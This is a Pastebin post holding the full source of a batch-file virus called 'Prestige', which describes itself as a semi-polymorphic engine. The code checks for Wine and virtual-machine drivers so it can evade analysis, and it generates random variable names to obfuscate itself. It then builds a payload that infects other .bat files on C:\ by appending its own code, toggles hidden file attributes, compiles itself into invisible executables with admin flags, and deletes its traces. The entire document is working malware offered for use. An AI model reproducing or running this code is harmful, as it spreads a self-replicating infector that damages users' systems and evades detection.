FlyFar

Prestige - A Semi-Polymorphic Batch Virus - Source Code

Jul 12th, 2023
117
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 4.10 KB | Cybersecurity | 0 0
  1. ::This is a polymorphic engine wrote completely in Batch
  2. ::@blmvxer
  3. ::
  4. ::We Need Anti-Wine(Utilize-Wine), Anti-Vbox, and Anti-Emulator::
  5. @echo off
  6. ::Check for WINE
  7. IF EXIST "Z:\" (GOTO WINE) ELSE (GOTO NOWINE)
  8. :WINE
  9. echo "Wine Exist time to go!!!"
  10. goto AVWVBEM
  11. :NOWINE
  12. echo "Wine Not Found Continue"
  13. ::Anti-VirtualMachine
  14. IF EXIST "C:\windows\system32\drivers\vmci.sys" (GOTO AVWVBEM)
  15. IF EXIST "C:\windows\system32\drivers\vmhgfs.sys" (GOTO AVWVBEM)
  16. IF EXIST "C:\windows\system32\drivers\vmmouse.sys" (GOTO AVWVBEM)
  17. IF EXIST "C:\windows\system32\drivers\vmscsi.sys" (GOTO AVWVBEM)
  18. IF EXIST "C:\windows\system32\drivers\vmusbmouse.sys" (GOTO AVWVBEM)
  19. IF EXIST "C:\windows\system32\drivers\vmx_svga.sys" (GOTO AVWVBEM)
  20. IF EXIST "C:\windows\system32\drivers\vmxnet.sys" (GOTO AVWVBEM)
  21. IF EXIST "C:\windows\system32\drivers\VBoxMouse.sys" (GOTO AVWVBEM) ELSE (GOTO Lets_Begin)
  22. :Lets_Begin
  23. ::Set counter to 0 so we can run a new encryption for different strings
  24. set counter=0
  25. ::Polymorphic Engine
  26. :loop
  27. setlocal EnableDelayedExpansion
  28. ::Set Longest Length to be 20
  29. set _RNDLength=20
  30. ::Our Character Pool
  31. set _Alphanumeric=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
  32. set _Str=%_Alphanumeric%987654321
  33. :_Lenloop
  34. if not "%_Str:~18%"=="" set _Str=%_Str:~9%& set /A _Len+=9& goto :_Lenloop
  35. set _tmp=%_Str:~9,1%
  36. set /A _Len=_Len+_tmp
  37. set _count=0
  38. set _RndAlphaNum=
  39. :_loop
  40. ::The Magic!
  41. set /A _count+=1
  42. set _RND=%random%
  43. set /A _RND=_RND%%%_Len%
  44. set _RndAlphaNum=!_RndAlphaNum!!_Alphanumeric:~%_RND%,1!
  45. if !_count! lss %_RNDLength% goto _loop
  46. ::String Encryption
  47. ::We run through the whole Engine for each String to allow a completely random charater length
  48. ::and Generated String.
  49. set /A counter=%counter%+1
  50. if %counter% EQU 1 set AAA=!_RndAlphaNum!
  51. if %counter% EQU 2 set BBB=!_RndAlphaNum!
  52. if %counter% EQU 3 set CCC=!_RndAlphaNum!
  53. if %counter% EQU 4 set DDD=!_RndAlphaNum!
  54. if %counter% EQU 5 set FFF=!_RndAlphaNum!
  55. if %counter% EQU 6 set GGG=!_RndAlphaNum!
  56. if %counter% EQU 7 set LLL=!_RndAlphaNum!
  57. if %counter% EQU 8 set MMM=!_RndAlphaNum!
  58. if %counter% EQU 9 set JJJ=!_RndAlphaNum!
  59. if %counter% EQU 10 set KKK=!_RndAlphaNum!
  60. if %counter% EQU 10 (goto ENCR) else (goto loop)
  61. :ENCR
  62. ::Virus Protection
  63. copy /Y poly.exe C:\!FFF!.exe
  64. del /F poly.exe
  65. goto VIRUS
  66. ::Here is where we pass our encryption over to the virus,
  67. :VIRUS
  68. set "us=%%0"
  69. set "lvar=@echo off"
  70. (
  71. echo !lvar!
  72. ) > !DDD!.bat
  73. ::Attributes
  74. set "attrib1=attrib +r +h !us!"
  75. (
  76. echo !attrib1!
  77. ) >> !DDD!.bat
  78. ::Standard SET Encryption with PolyStrings
  79. echo set !AAA!=for >> !DDD!.bat
  80. echo set !BBB!=do >> !DDD!.bat
  81. echo set !CCC!=type >> !DDD!.bat
  82. set "var=%%%%a"
  83. set "var2=%%%%F"
  84. set "var6=%%%%"
  85. set "var7=in"
  86. echo SET SrcCount=0 >> !DDD!.bat
  87. echo SET SrcMax=%%RANDOM%% >> !DDD!.bat
  88. set "findvictim=%%!AAA!%% /R !var2! IN (C:\*.bat) DO IF !SrcCount! LSS %%SrcMax%% ("
  89. (
  90. echo !findvictim!
  91. ) >> !DDD!.bat
  92. set "var3=SET %/A% SrcCount += 1"
  93. set "var4=Set victim=!var6!!var2!"
  94. set "var5=)"
  95. (
  96. echo !var3!
  97. echo !var4!
  98. echo !var5!
  99. ) >> !DDD!.bat
  100. ::Push the completed virus code to new host
  101. set "virus=%%!AAA!%% /R !var! !var7! (%%victim%%) %%!BBB!%% %%!CCC!%% !us! >> !var!"
  102. (
  103. echo !virus!
  104. ) >> !DDD!.bat
  105. ::Attributes 2
  106. set "attrib2=attrib -r -h !us!"
  107. (
  108. echo !attrib2!
  109. ) >> !DDD!.bat
  110. goto :CheckOS
  111. ::
  112. :CheckOS
  113. IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT)
  114. :64BIT
  115. start b2exe64.exe -bat !DDD!.bat -save !DDD!.exe -invisible -admin -overwrite
  116. GOTO DONE
  117. :32BIT
  118. start b2exe32.exe -bat !DDD!.bat -save !DDD!.exe -invisible -admin -overwrite
  119. GOTO DONE
  120. :DONE
  121. del !DDD!.bat
  122. mkdir C:\fij4Jdo9mdn00sqW
  123. move !DDD!.exe C:\fij4Jdo9mdn00sqW
  124. move poly.bat C:\fij4Jdo9mdn00sqW
  125. :CheckOS2
  126. IF EXIST "%PROGRAMFILES(X86)%" (GOTO 641BIT) ELSE (GOTO 321BIT)
  127. :641BIT
  128. start b2exe64.exe -bat C:\fij4Jdo9mdn00sqW\poly.bat -save C:\fij4Jdo9mdn00sqW\!MMM!.exe -invisible -admin -overwrite
  129. GOTO END
  130. :321BIT
  131. start b2exe32.exe -bat C:\fij4Jdo9mdn00sqW\poly.bat -save C:\fij4Jdo9mdn00sqW\!MMM!.exe -invisible -admin -overwrite
  132. ::END
  133. del /f %curdir%\b2exe32.exe
  134. del /f %curdir%\b2exe64.exe
  135. del %curdir%\poly.exe
  136. :AVWVBEM
  137. exit
Add Comment
Please, Sign In to add comment